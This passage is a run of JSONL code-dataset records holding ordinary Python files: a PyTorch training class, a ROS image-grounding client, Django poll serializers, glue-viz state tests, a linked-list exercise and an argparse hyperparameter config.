**kwargs)\n\n def set_scheduler(self, name, *args, **kwargs) -> None:\n \"\"\"Set the sceduler used for decreasing the LR\n\n Parameters\n ----------\n name\n Scheduler name\n\n \"\"\"\n if name is None:\n self.scheduler = None\n else:\n self.scheduler = getattr(torch.optim.lr_scheduler,\n name)(self.optimizer, *args, **kwargs)\n\n def split_data(self, frac: Tuple[float, float], batch_size: int):\n \"\"\"Split the data into a training and validation set.\n\n Parameters\n ----------\n frac\n fraction to divide the dataset, by default [0.8, 0.2]\n \"\"\"\n # create the dataloader\n indices_train, indices_validate = self.data.create_data_loader(frac=frac, batch_size=batch_size)\n self.labels_trainset = self.data.labels[indices_train]\n self.labels_validset = self.data.labels[indices_validate]\n self.store_trainset_in_state(np.concatenate((indices_train, indices_validate)), len(indices_validate), store_features=False)\n\n def train_model(self,\n nepoch: int,\n frac: Tuple[float, float] = (0.8, 0.2),\n batch_size: int = 64) -> Tuple[Tensor, Tensor]:\n \"\"\"Train the model\n\n Parameters\n ----------\n nepoch : int\n number of ecpoch to run\n frac : List[int], optional\n divide the dataset in train/valid, by default [0.8, 0.2]\n batch_size : int, optional\n batchsize, by default 64\n \"\"\"\n LOGGER.info(\"TRAINING STEP\")\n self.split_data(frac, batch_size)\n\n # run over the epochs\n for epoch in range(self.epoch, self.epoch + nepoch):\n LOGGER.info(f\"epoch: {epoch}\")\n results = []\n expected = []\n\n # set the model to train mode\n # and init loss\n self.network.train()\n loss_all = 0.\n\n # iterate over the data loader\n for batch_data in self.data.train_loader:\n x_batch, y_batch = self.data.get_item(batch_data)\n x_batch = x_batch.to(self.device)\n y_batch = y_batch.to(self.device)\n loss_batch, predicted = self.train_batch(x_batch, y_batch)\n loss_all += loss_batch\n results.append(predicted)\n expected.append(y_batch)\n\n # Train loss\n loss = loss_all / len(self.data.train_dataset)\n self.train_losses.append(loss)\n LOGGER.info(f\"Loss: {loss}\")\n\n # decrease the LR if necessary\n if self.scheduler is not None:\n self.scheduler.step()\n\n # Check for early stopping\n self.validate_model()\n self.validation_losses.append(self.validation_loss)\n self.early_stopping(self.save_model, epoch, self.validation_loss)\n if self.early_stopping.early_stop:\n LOGGER.info(\"EARLY STOPPING\")\n break\n\n # Save the models\n self.save_model(epoch, loss_all)\n\n # Store the loss\n self.state.store_array(\"loss_train\", self.train_losses)\n self.state.store_array(\"loss_validate\", self.validation_losses)\n\n return tuple(self.inverse_transform(torch.cat(x)) for x in (results, expected))\n\n def train_batch(self, inp_data: Tensor, ground_truth: Tensor) -> Tuple[float, Tensor]:\n \"\"\"Train a single mini batch\n\n Parameters\n ----------\n inp_data : Tensor\n input data of the network\n ground_truth : Tensor\n ground trurth of the data points in input\n\n Returns\n -------\n float\n loss over the mini batch\n \"\"\"\n prediction = self.network(inp_data)\n loss = self.loss_func(prediction, ground_truth)\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n return loss.item(), prediction\n\n def validate_model(self) -> Tuple[Tensor, Tensor]:\n \"\"\"compute the output of the model on the validation set\n\n Returns\n -------\n Tuple[Tensor, Tensor]\n output of the network, ground truth of the data\n \"\"\"\n results = []\n expected = []\n\n # Disable any gradient calculation\n with torch.no_grad():\n self.network.eval()\n loss_all = 0\n for batch_data in self.data.valid_loader:\n x_val, y_val = self.data.get_item(batch_data)\n x_val = x_val.to(self.device)\n y_val = y_val.to(self.device)\n predicted = self.network(x_val)\n loss = self.loss_func(predicted, y_val)\n loss_all += loss.item()\n results.append(predicted)\n expected.append(y_val)\n self.validation_loss = loss_all / len(self.data.valid_dataset)\n LOGGER.info(f\"validation loss: {self.validation_loss}\")\n\n return tuple(self.inverse_transform(torch.cat(x)) for x in (results, expected))\n\n def predict(self, inp_data: Tensor) -> Tensor:\n \"\"\"compute output of the model for a given input\n\n Parameters\n ----------\n inp_data\n input data of the network\n\n Returns\n -------\n Tensor\n output of the network\n \"\"\"\n with torch.no_grad():\n self.network.eval() # Set model to evaluation mode\n predicted = self.network(inp_data)\n return predicted\n\n def save_model(self,\n epoch: int,\n loss: float,\n filename: str = 'swan_chk.pt') -> None:\n \"\"\"Save the modle current status.\"\"\"\n path = self.workdir / filename\n torch.save(\n {\n 'epoch': epoch,\n 'model_state_dict': self.network.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'loss': loss\n }, path)\n\n def load_model(self, filename: PathLike) -> None:\n \"\"\"Load the model from the state file.\"\"\"\n checkpoint = torch.load(filename)\n self.network.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n self.epoch = checkpoint['epoch']\n self.loss = checkpoint['loss']\n\n def inverse_transform(self, arr: Tensor) -> np.ndarray:\n \"\"\"Unscale ``arr`` using the fitted scaler.\"\"\"\n def _detach(arr: Tensor) -> np.ndarray:\n arr = arr.detach().numpy()\n if len(arr.shape) == 1:\n arr = arr.reshape(-1, 1)\n\n return arr\n\n try:\n return self.data.transformer.inverse_transform(_detach(arr))\n except sklearn.exceptions.NotFittedError:\n return _detach(arr)\n","repo_name":"nlesc-nano/swan","sub_path":"swan/modeller/torch_modeller.py","file_name":"torch_modeller.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"42145904571","text":"#!/usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import Image\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nimport xml.etree.ElementTree as ET\nimport actionlib\nimport ingress_msgs.msg\nimport copy\nimport numpy as np\nimport os\n\n\ndef get_bboxes_from_xml(xml_path):\n xml_tree = ET.parse(xml_path)\n root = xml_tree.getroot()\n\n bboxes = []\n for obj in root.findall('object'):\n bbox_tmp = obj.find('bndbox')\n bboxes.append(float(bbox_tmp.find('xmin').text))\n bboxes.append(float(bbox_tmp.find('ymin').text))\n bboxes.append(float(bbox_tmp.find('xmax').text) - float(bbox_tmp.find('xmin').text))\n bboxes.append(float(bbox_tmp.find('ymax').text) - float(bbox_tmp.find('ymin').text))\n\n rospy.loginfo(\"bboxes found: {}\".format(bboxes))\n return bboxes\n\n\ndef ground_img_with_bbox(load_client, img, bboxes):\n\n # load image, extract and store feature vectors for each bounding box\n img_msg = CvBridge().cv2_to_imgmsg(img, \"rgb8\")\n goal = ingress_msgs.msg.DenseRefexpLoadBBoxesGoal()\n goal.input = img_msg\n goal.boxes = bboxes\n load_client.send_goal(goal)\n load_client.wait_for_result()\n load_result = load_client.get_result()\n\n rospy.loginfo(\"ground_img_with_bbox, result received\")\n rospy.loginfo(\"captions: {}\".format(load_result.captions))\n rospy.loginfo(\"scores: {}\".format(load_result.scores))\n\n # ------------------------------------------------\n # visualization\n draw_img = img.copy()\n for idx in range(0, len(bboxes), 4):\n x1 = int(bboxes[idx])\n y1 = int(bboxes[idx + 1])\n x2 = int(x1 + bboxes[idx + 2])\n y2 = int(y1 + bboxes[idx + 3])\n\n cv2.rectangle(draw_img, (x1, y1), (x2, y2), (0, 0, 255), 5)\n\n # add captions\n font = cv2.FONT_HERSHEY_DUPLEX\n # print(\"x1 {}, y1 {}\".format(x1, y1))\n if y1 - 15 > 5:\n cv2.putText(draw_img, load_result.captions[int(idx // 4)],\n (x1 + 6, y1 - 15), font, 1, (255, 255, 255), 2)\n else:\n cv2.putText(draw_img, load_result.captions[int(idx // 4)],\n (x1 + 6, y1 + 5), font, 1, (255, 255, 255), 2)\n\n cv2.imwrite('./grounding_result.png', draw_img)\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('Grounding', anonymous=True)\n\n # wait for action servers to show up\n # if you are stuck here, that means the servers are not ready\n # or your network connection is broken\n load_client = actionlib.SimpleActionClient(\n 'dense_refexp_load_bboxes', ingress_msgs.msg.DenseRefexpLoadBBoxesAction)\n rospy.loginfo(\"1. Waiting for dense_refexp_load_bboxes action server ...\")\n load_client.wait_for_server()\n\n query_client = actionlib.SimpleActionClient(\n 'dense_refexp_query', ingress_msgs.msg.DenseRefexpQueryAction)\n rospy.loginfo(\"2. Waiting for dense_refexp_query action server ...\")\n query_client.wait_for_server()\n\n rospy.loginfo(\"Ingress server found! Ready.\")\n\n while not rospy.is_shutdown():\n try:\n # get image\n img_path = raw_input(\"Enter path to image: \")\n img_path = \"images/\" + img_path\n img = cv2.imread(img_path, cv2.IMREAD_COLOR)\n\n xml_path = os.path.splitext(img_path)[0] + '.xml'\n bboxes = get_bboxes_from_xml(xml_path)\n except Exception as e:\n rospy.logerr(e)\n\n ground_img_with_bbox(load_client, img, bboxes)\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AdaCompNUS/ingress-proj","sub_path":"examples/grounding_img_with_bboxes.py","file_name":"grounding_img_with_bboxes.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"43391156622","text":"from drf_yasg.utils import swagger_serializer_method\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom polls.models import Poll, Participant, Choice\nfrom polls.utils import get_user_data\n\n\nclass ChoiceIdsSerializer(serializers.Serializer):\n choices_id = serializers.ListField(child=serializers.UUIDField(), allow_empty=False)\n\n def validate_choices_id(self, choices_id):\n \"\"\"\n Prepares valid choices for a Poll.\n Returns QuerySet of existing choices in a Poll.\n \"\"\"\n\n valid_choices = self.context['poll'].choices.filter(id__in=choices_id)\n return valid_choices\n\n def validate(self, attrs):\n multi_selection = self.context['poll'].multi_selection\n if attrs['choices_id'].count() > 1 and not multi_selection:\n raise ValidationError({'choices_id': 'multiple choices are not available'})\n\n return attrs\n\n def save(self, user_data):\n \"\"\"\n Saves vote for each choice.\n \"\"\"\n\n participant, _ = Participant.objects.get_or_create(\n ip=user_data['ip'], defaults={'user_agent': user_data['user_agent']}\n )\n\n for choice in self.validated_data['choices_id']:\n choice.participants.add(participant)\n\n\nclass ChoiceSerializer(serializers.ModelSerializer):\n votes = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=serializers.IntegerField)\n def get_votes(self, obj):\n \"\"\"Counts votes for each choice.\"\"\"\n return obj.participants.count()\n\n class Meta:\n model = Choice\n fields = ('choice', 'votes', 'id')\n\n\nclass PollSerializer(serializers.ModelSerializer):\n choices = ChoiceSerializer(many=True)\n link = serializers.SerializerMethodField(read_only=True)\n\n def get_link(self, obj):\n return self.context['request'].build_absolute_uri(obj.url)\n\n class Meta:\n model = Poll\n fields = ('id', 'title', 'choices', 'link', 'created_at', 'multi_selection')\n\n\nclass PollCreateSerializer(serializers.ModelSerializer):\n choices = serializers.ListField(allow_empty=False)\n\n class Meta:\n model = Poll\n fields = ('title', 'choices', 'multi_selection')\n\n def create(self, validated_data):\n \"\"\"Performs create the poll.\"\"\"\n\n user_data = get_user_data(self.context['request'])\n creator, _ = Participant.objects.get_or_create(\n ip=user_data['ip'], defaults={'user_agent': user_data['user_agent']}\n )\n poll = Poll.objects.create(\n creator=creator,\n title=validated_data['title'],\n multi_selection=validated_data['multi_selection'],\n )\n\n Choice.objects.bulk_create(\n [Choice(choice=choice, poll=poll) for choice in validated_data['choices']]\n )\n\n return poll\n","repo_name":"gixproject/polls","sub_path":"polls/api/v1/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27344308693","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reverseList(self, head: [ListNode]) -> [ListNode]:\n\n # iterative\n if not head:\n return head\n tail = head\n while head.next:\n next_tail = head.next\n head.next = next_tail.next\n next_tail.next = tail\n tail = next_tail\n return tail\n\n # recursion, not my code\n # if not head or not head.next:\n # return head\n # p = self.reverseList(head.next)\n # head.next.next = head\n # head.next = None\n # return p\n\n\n_head = ListNode(1, ListNode(2, ListNode(3, ListNode(4, ListNode(5)))))\n\nprint(Solution().reverseList(_head))\n","repo_name":"Sadomtsevvs/Leetcode","sub_path":"206. Reverse Linked List.py","file_name":"206. Reverse Linked List.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4980063021","text":"import json\nimport threading\nfrom typing import Dict, Any\n\nDATA_FILE = \"data.json\"\n\nclass UnsafeOperation(Exception):\n pass\nclass Data:\n def __init__(self, data_file: str):\n self.data_file: str = data_file\n self.data: Dict[str, Any] = None\n self.lock = threading.Lock()\n \n def require_lock(self):\n if not self.lock.locked():\n raise UnsafeOperation\n\n def read(self):\n self.require_lock()\n try:\n with open(self.data_file) as data_file:\n self.data = json.load(data_file)\n except:\n print(f\"Failed to load {self.data_file}\")\n self.data = {}\n\n def write(self):\n self.require_lock()\n with open(self.data_file, \"w\") as data_file:\n json.dump(self.data, data_file)\n\n def get(self):\n self.require_lock()\n if self.data is None:\n self.read()\n return self.data\n\nDATA = Data(DATA_FILE)","repo_name":"mlutze/dough","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34775877540","text":"import numpy as np\n\nfrom numpy.testing import assert_allclose\n\nfrom echo import CallbackProperty, ListCallbackProperty\nfrom glue.core import Data, DataCollection\n\nfrom .test_state import clone\nfrom ..state_objects import (State, StateAttributeLimitsHelper,\n StateAttributeSingleValueHelper,\n StateAttributeHistogramHelper)\n\n\nclass SimpleTestState(State):\n a = CallbackProperty()\n b = CallbackProperty()\n flat = ListCallbackProperty()\n nested = ListCallbackProperty()\n\n\ndef test_state_serialization():\n\n state1 = SimpleTestState()\n state1.a = 2\n state1.b = 'hello'\n state1.flat = [1, 3, 4]\n\n sub_state = SimpleTestState()\n sub_state.a = 3\n sub_state.b = 'blah'\n sub_state.flat = [1, 2]\n sub_state.nested = []\n\n state1.nested = [1, 3, sub_state]\n\n state2 = clone(state1)\n\n assert state2.a == 2\n assert state2.b == 'hello'\n assert state2.flat == [1, 3, 4]\n assert state2.nested[0:2] == [1, 3]\n assert state2.nested[2].a == 3\n assert state2.nested[2].b == 'blah'\n assert state2.nested[2].flat == [1, 2]\n assert state2.nested[2].nested == []\n\n\nEXPECTED_STR = \"\"\"\na: 2\nb: hello\nflat: \nnested: \n\"\"\"\n\nEXPECTED_REPR = \"\"\"\n\n nested: \n>\n\"\"\"\n\n\ndef test_state_str_repr():\n\n state1 = SimpleTestState()\n state1.a = 2\n state1.b = 'hello'\n state1.flat = [1, 3, 4]\n\n sub_state = SimpleTestState()\n\n state1.nested = [1, 3, sub_state]\n\n assert str(state1) == EXPECTED_STR.strip()\n assert repr(state1) == EXPECTED_REPR.strip()\n\n\nclass TestStateAttributeLimitsHelper():\n\n def setup_method(self, method):\n\n self.data = Data(x=np.linspace(-100, 100, 10000),\n y=np.linspace(2, 3, 10000), label='test_data')\n\n self.data_collection = DataCollection([self.data])\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n log = CallbackProperty(False)\n scale = CallbackProperty(100)\n\n self.state = SimpleState()\n\n self.helper = StateAttributeLimitsHelper(self.state, attribute='comp',\n lower='lower', upper='upper',\n percentile='scale', log='log')\n self.state.data = self.data\n self.state.comp = self.data.id['x']\n\n self.x_id = self.data.main_components[0]\n self.y_id = self.data.main_components[1]\n\n def test_minmax(self):\n assert self.helper.lower == -100\n assert self.helper.upper == +100\n\n def test_change_attribute(self):\n self.helper.attribute = self.y_id\n assert self.helper.lower == 2\n assert self.helper.upper == 3\n self.helper.attribute = self.x_id\n assert self.helper.lower == -100\n assert self.helper.upper == +100\n\n def test_change_percentile(self):\n\n # Changing scale mode updates the limits\n self.helper.percentile = 99.5\n assert_allclose(self.helper.lower, -99.5)\n assert_allclose(self.helper.upper, +99.5)\n self.helper.percentile = 99\n assert_allclose(self.helper.lower, -99)\n assert_allclose(self.helper.upper, +99)\n self.helper.percentile = 90\n assert_allclose(self.helper.lower, -90)\n assert_allclose(self.helper.upper, +90)\n\n # When switching to custom, the last limits are retained\n self.helper.percentile = \"Custom\"\n assert_allclose(self.helper.lower, -90)\n assert_allclose(self.helper.upper, +90)\n\n def test_percentile_cached(self):\n # Make sure that if we change scale and change attribute, the scale\n # modes are cached on a per-attribute basis.\n self.helper.percentile = 99.5\n self.state.comp = self.y_id\n assert self.helper.percentile == 100\n self.helper.percentile = 99\n self.state.comp = self.x_id\n assert self.helper.percentile == 99.5\n self.state.comp = self.y_id\n assert self.helper.percentile == 99\n\n def test_flip_button(self):\n\n self.helper.flip_limits()\n\n assert self.helper.lower == +100\n assert self.helper.upper == -100\n\n # Make sure that values were re-cached when flipping\n self.state.comp = self.y_id\n assert self.helper.lower == 2\n assert self.helper.upper == 3\n self.state.comp = self.x_id\n assert self.helper.lower == +100\n assert self.helper.upper == -100\n\n def test_manual_edit(self):\n\n # Make sure that values are re-cached when edited manually\n self.helper.percentile = \"Custom\"\n self.state.lower = -122\n self.state.upper = 234\n self.helper.log = True\n assert self.helper.lower == -122\n assert self.helper.upper == 234\n assert self.helper.log\n self.state.comp = self.y_id\n assert self.helper.lower == 2\n assert self.helper.upper == 3\n assert not self.helper.log\n self.state.comp = self.x_id\n assert self.helper.lower == -122\n assert self.helper.upper == 234\n assert self.helper.log\n\n\nclass TestStateAttributeSingleValueHelper():\n\n def setup_method(self, method):\n\n self.data = Data(x=np.linspace(-100, 30, 9999),\n y=np.linspace(2, 3, 9999), label='test_data')\n\n self.data_collection = DataCollection([self.data])\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n val = CallbackProperty()\n\n self.state = SimpleState()\n\n self.helper = StateAttributeSingleValueHelper(self.state, attribute='comp',\n function=np.nanmedian, value='val')\n\n self.state.data = self.data\n\n self.state.comp = self.data.id['x']\n\n self.x_id = self.data.main_components[0]\n self.y_id = self.data.main_components[1]\n\n def test_value(self):\n assert self.helper.value == -35.\n\n def test_change_attribute(self):\n self.helper.attribute = self.y_id\n assert self.helper.value == 2.5\n self.helper.attribute = self.x_id\n assert self.helper.value == -35\n\n def test_manual_edit(self):\n self.state.val = 42.\n assert self.helper.value == 42\n self.state.comp = self.y_id\n assert self.helper.value == 2.5\n self.state.comp = self.x_id\n assert self.helper.value == 42\n\n\nclass TestStateAttributeHistogramHelper():\n\n def setup_method(self, method):\n\n self.data = Data(x=[-3.2, 4.3, 2.2, 5.4, 7.2, -1.1, 2.3],\n y=['a', 'f', 'd', 'e', 'f', 'f', 'a'], label='test_data')\n\n self.data_collection = DataCollection([self.data])\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n x_min = CallbackProperty()\n x_max = CallbackProperty()\n n_bin = CallbackProperty()\n\n self.state = SimpleState()\n\n self.helper = StateAttributeHistogramHelper(self.state, attribute='comp',\n lower='x_min', upper='x_max', n_bin='n_bin')\n\n self.state.data = self.data\n\n def test_default_numerical(self):\n self.state.comp = self.data.id['x']\n assert self.state.x_min == -3.2\n assert self.state.x_max == 7.2\n assert self.state.n_bin == 15\n\n def test_default_categorical(self):\n self.state.comp = self.data.id['y']\n assert self.state.x_min == -0.5\n assert self.state.x_max == 3.5\n assert self.state.n_bin == 4\n\n def test_hitting_limits(self):\n\n # FIXME: here we modify the internal defaults rather than making a new\n # state helper, but this could be improved\n self.helper._default_n_bin = 4\n self.helper._max_n_bin = 3\n\n self.state.comp = self.data.id['x']\n assert self.state.x_min == -3.2\n assert self.state.x_max == 7.2\n assert self.state.n_bin == 4\n\n self.state.comp = self.data.id['y']\n assert self.state.x_min == -0.5\n assert self.state.x_max == 3.5\n assert self.state.n_bin == 3\n\n def test_caching(self):\n self.state.comp = self.data.id['x']\n self.state.x_min = 2\n self.state.x_max = 7\n self.state.n_bin = 8\n self.state.comp = self.data.id['y']\n self.state.x_min = 1.5\n self.state.x_max = 3.5\n self.state.n_bin = 3\n self.state.comp = self.data.id['x']\n assert self.state.x_min == 2\n assert self.state.x_max == 7\n assert self.state.n_bin == 8\n self.state.comp = self.data.id['y']\n assert self.state.x_min == 1.5\n assert self.state.x_max == 3.5\n assert self.state.n_bin == 3\n\n\ndef test_histogram_helper_common_n_bin():\n\n data = Data(x=[-3.2, 4.3, 2.2],\n y=['a', 'f', 'd'],\n z=[1.1, 2.3, 1.2],\n label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n x_min = CallbackProperty()\n x_max = CallbackProperty()\n n_bin = CallbackProperty()\n common = CallbackProperty()\n\n state = SimpleState()\n\n helper = StateAttributeHistogramHelper(state, attribute='comp',\n lower='x_min', upper='x_max', n_bin='n_bin',\n common_n_bin='common')\n\n state.data = data\n\n state.comp = data.id['x']\n state.n_bin = 9\n state.comp = data.id['y']\n assert state.n_bin == 3\n state.comp = data.id['z']\n assert state.n_bin == 15\n\n state.n_bin = 12\n\n state.common = True\n\n state.comp = data.id['x']\n assert state.n_bin == 12\n\n state.n_bin = 11\n\n state.comp = data.id['y']\n assert state.n_bin == 3\n state.comp = data.id['z']\n assert state.n_bin == 11\n\n state.common = False\n state.n_bin = 13\n\n state.comp = data.id['x']\n assert state.n_bin == 11\n\n\ndef test_histogram_helper_common_n_bin_active():\n\n # Make sure that common_n_bin works as expected if True from start\n\n data = Data(x=[-3.2, 4.3, 2.2],\n y=['a', 'f', 'd'],\n z=[1.1, 2.3, 1.2],\n label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n x_min = CallbackProperty()\n x_max = CallbackProperty()\n n_bin = CallbackProperty()\n common = CallbackProperty(True)\n\n state = SimpleState()\n\n helper = StateAttributeHistogramHelper(state, attribute='comp',\n lower='x_min', upper='x_max', n_bin='n_bin',\n common_n_bin='common')\n\n state.data = data\n\n state.comp = data.id['x']\n state.n_bin = 9\n state.comp = data.id['z']\n assert state.n_bin == 9\n\n state.n_bin = 12\n\n state.common = True\n\n state.comp = data.id['x']\n assert state.n_bin == 12\n\n state.n_bin = 11\n\n state.comp = data.id['y']\n assert state.n_bin == 3\n state.comp = data.id['z']\n assert state.n_bin == 11\n\n state.common = False\n state.n_bin = 13\n\n state.comp = data.id['x']\n assert state.n_bin == 11\n\n\ndef test_limits_helper_initial_values():\n\n # Regression test for a bug that occurred if the limits cache was empty\n # but some attributes were set to values - in this case we don't want to\n # override the existing values.\n\n data = Data(x=np.linspace(-100, 100, 10000),\n y=np.linspace(2, 3, 10000), label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n\n state = SimpleState()\n state.lower = 1\n state.upper = 2\n state.comp = data.id['x']\n\n helper = StateAttributeLimitsHelper(state, attribute='comp',\n lower='lower', upper='upper')\n\n assert helper.lower == 1\n assert helper.upper == 2\n\n\nclass DatetimeState(State):\n a = CallbackProperty()\n\n\ndef test_state_serialization_datetime64():\n\n state1 = DatetimeState()\n state1.a = np.datetime64(100, 'D')\n\n state2 = clone(state1)\n\n assert state2.a == np.datetime64(100, 'D')\n\n\ndef test_nan_inf_minmax():\n\n data = Data(x=[3, 1, -2, np.inf, np.nan], label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n percentile = CallbackProperty()\n log = CallbackProperty()\n\n state = SimpleState()\n\n helper = StateAttributeLimitsHelper(state, attribute='comp', # noqa\n lower='lower', upper='upper',\n percentile='percentile', log='log')\n\n state.data = data\n state.comp = data.id['x']\n\n assert state.lower == -2\n assert state.upper == +3\n\n state.log = True\n\n assert state.lower == +1\n assert state.upper == +3\n\n state.log = False\n state.percentile = 99\n\n assert_allclose(state.lower, -1.97)\n assert_allclose(state.upper, +2.98)\n\n\ndef test_percentile_no_log():\n\n # Regression test for a bug that caused a crash if the state class had a\n # percentile attribute but no log.\n\n data = Data(x=np.linspace(-100, 100, 10000),\n y=np.linspace(2, 3, 10000), label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n scale = CallbackProperty()\n\n state = SimpleState()\n\n state.comp = data.id['x']\n state.lower = 2\n state.upper = 4\n\n helper = StateAttributeLimitsHelper(state, attribute='comp',\n lower='lower', upper='upper',\n percentile='scale')\n\n state.scale = 90\n","repo_name":"glue-viz/glue","sub_path":"glue/core/tests/test_state_objects.py","file_name":"test_state_objects.py","file_ext":"py","file_size_in_byte":14278,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"54"} +{"seq_id":"21028678337","text":"import random\nx = ['Dan', 'Lukasz', 'Konrad', 'Madi', 'Ewelina B.', 'Ewelina', 'Gosia', 'Zosia', 'Ula', 'Tomek',] # people list\ny = [] # machine list\nwhile True:\n p = input('how many people at overtimes?')\n if p.isdecimal():\n pp= int(p)\n break\n \n\n\n\ni = 0\n\nwhile i < pp:\n while True:\n c = input('name: ')\n if c.isdecimal():\n cc=str(c)\n x.append(c)\n break\n i+=1\n \n\ni = 0\nl = len(x) \n\nwhile i < l :\n while True:\n d = input('machine nr:')\n if d.isdecimal():\n dd=int(d)\n y.append(d)\n break\n i+=1\nprint('---------------------------------------')\ni = 0\nrandom.shuffle(y)\nrandom.shuffle(x)\ni = 0\nwhile i < l:\n print(x[i], y[i], sep=' - ')\n i+=1\n\n","repo_name":"pydanielthon/mps-programy","sub_path":"losowanie maszyn i ludzi.py","file_name":"losowanie maszyn i ludzi.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11816229955","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nUniwalk\n- An explainable and accurate recommender system\n for rating and network data\n\nAuthors\n- Haekyu Park (hkpark627@snu.ac.kr)\n- Hyunsik Jeon (jeon185@gmail.com)\n- Junghwan Kim (kjh900809@snu.ac.kr)\n- Beunguk Ahn (elaborate@snu.ac.kr)\n- U Kang (ukang@snu.ac.kr)\n\nFile\n- parser.py\n : controls hyperparameters\n\nThis software is free of charge under research purposes.\nFor commercial purposes, please contact the authors.\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nImport Package\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport argparse\nimport numpy as np\nimport pandas as pd\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nParse arguments\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Define hyperparameters\ndef parse_args():\n\t# Create an argument parser\n\tparser = argparse.ArgumentParser('UniWalk')\n\n\t# Arguments related to input\n\tparser.add_argument('--dataset', default='filmtrust', help='Dataset name')\n\tparser.add_argument('--min_u_id', default=0, help='Min id of users')\n\tparser.add_argument('--max_u_id', default=1641, help='Max id of users')\n\tparser.add_argument('--min_i_id', default=1642, help='Min id of items')\n\tparser.add_argument('--max_i_id', default=3712, help='Max id of items')\n\tparser.add_argument('--max_r', default=0.5, help='Max of observed rating')\n\tparser.add_argument('--min_r', default=4.0, help='Min of observed rating')\n\tparser.add_argument('--mu', default=3, help='Average observed rating')\n\tparser.add_argument('--num_entities', default=0, help='Number of entities')\n\n\t# Arguments related to file paths\n\tparser.add_argument('--inputpath', default='', help='Path of data files')\n\tparser.add_argument('--graphpath', default='', help='Path of unified graph')\n\tparser.add_argument('--learningpath', default='', help='Path of result files')\n\t\n\t# Arguments related to building graph\n\tparser.add_argument('--c', default=5, help='Weight of user-user edges')\n\n\t# Arguments related to the sampling phase\n\tparser.add_argument('--wl', default=50, help='Walk length')\n\n\t# Arguments related to the optimization phase\n\tparser.add_argument('--ws', default=7, help='Window size')\n\tparser.add_argument('--alpha', default=0.01, help='Weight of positive term')\n\tparser.add_argument('--beta', default=0.005, help='Weight of negative term')\n\tparser.add_argument('--gamma', default=0.2, help='Momentum parameter')\n\tparser.add_argument('--dim', default=25, help='Dimension of embedded vectors')\n\tparser.add_argument('--lz', default=0.1, help='Regularization parameter for 